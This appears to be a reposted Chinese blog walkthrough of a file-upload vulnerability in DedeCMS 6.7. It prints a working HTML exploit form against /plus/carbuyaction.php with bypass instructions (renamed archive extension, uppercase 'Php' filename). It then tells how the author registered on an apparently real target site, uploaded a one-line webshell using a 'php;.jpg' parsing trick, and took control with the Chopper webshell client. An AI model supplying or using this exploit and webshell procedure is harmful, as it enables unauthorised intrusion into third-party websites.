下面是 织梦dedecms 6.7上传 漏洞 目标站点 爬出来全是html 御剑扫描一下 打开一看是织梦的,可以注册。 前些天看到过大牛发表的织梦上传漏洞 <form action="http:// HdhCmsTest2cto测试数据 /plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br> 1,必须登陆用户。<br> 2,将待上传 PHP 文件扩展名改为[zip|gz|rar|iso|doc|xsl|ppt|wps]其中之一。<br> 3,newname为上传后的新文件名,扩展名使用大写绕过,如[Php]。<br> </form> 于是注册用户,构造 html 文件,将文件格式改为rar,进行上传一句话 结果并没有那么简单, 怎么回事呢?我尝试了改其他格式的文件名都无法上传。 因为上传之后文件是直接在站点根目录,所以我想到了解析漏洞php;.jpg 页面出现空白 用菜刀连接一下, 成功进入。谢谢观看 原文:情 blog
查看更多关于织梦cms v6.7最新上传漏洞 - 网站安全 - 自学php的详细内容...